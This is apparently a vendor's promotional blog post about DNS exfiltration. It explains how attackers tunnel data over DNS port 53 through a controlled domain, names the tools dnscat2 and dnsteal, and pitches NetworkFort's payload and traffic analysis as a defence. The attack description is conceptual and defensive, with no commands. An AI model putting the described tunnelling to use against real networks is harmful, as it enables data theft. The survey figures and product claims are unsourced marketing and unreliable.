Countering DNS Exfiltration with NetworkFort Security Solutions
There are multiple backdoors and pathways that hackers can exploit for access to data but the one very common nowadays that is often overlooked is the DNS which is short for Domain Name System. There has been a recent spike in DNS attacks on devices that have been infected by malware or rogue employees for access to data.
What is DNS Exfiltration?
DNS acts as the phonebook for the internet, a sort of yellow page in other words. The DNS turns the domain names of any online service into an IP address. Every device connected to the internet has its own IP address, which is used by other devices to locate the device. DNS servers allow users to assign normal word characters as the address of the website or service without having to memorise the entire IP address for each new page they open or make.
DNS data exfiltration is a method to exchange data between two devices without any direct connection. Data exchange is possible by using DNS protocols on intermediate DNS servers. During the exfiltration phase, the client makes a DNS resolution request to an external DNS server address while using port 53. Port 53 is often open on most systems. This port is used to transmit DNS queries. DNS has always been designed to use both UDP and TCP port 53. But it uses UDP by default.
A server that has malware running on it is set up by the attackers and assigned a domain that points to it. Using a server that has been infected with malware, the attacker searches for the attacker-controlled domain. The DNS resolver creates a tunnel between the attacker and their target when it routes the query, allowing them to obtain data, remotely control the host, or otherwise carry out the attack. This can be achieved by employing the use of different tools such as dnscat2, dnsteal, etc.
A security survey of businesses in North America and Europe on their DNS revealed the following:
- 46 percent of respondents experienced DNS exfiltration
- 45 percent experienced DNS tunnelling.
Network Fort employs the use of Machine Learning and Artificial Intelligence to detect these attacks. There are two ways by which NF can detect the DNS Exfiltration attack.
Payload Analysis: Payload analysis helps us to detect malicious code by analysing the payload packets flowing through the network. If there is any anomaly found in the payload of packets, it is much easier to figure out the kind and intent of the malicious attack and by doing so, the creation of a tunnel can be prevented to avoid data exfiltration.
Traffic Analysis: Traffic analysis utilises information such as geographics, the amount of requests made, and the previously known history of the domain to segregate normal traffic from any anomaly in traffic. For instance, for network detection and response, machine learning is employed to set a baseline for what normal DNS behaviour looks like in any given environment, and then provides alerts and prompts for anomalous behaviour that could signify an attack.
To prevent your organisation from the harmful effects of DNS Exfiltration attacks, which are getting more popular nowadays, there is a solution called NetworkFort. It is a great cybersecurity network detection solution that protects your data from hackers. NetworkFort deploys AI algorithms and machine learning techniques to provide the greatest level of visibility with increased insight into the entire cyber security system.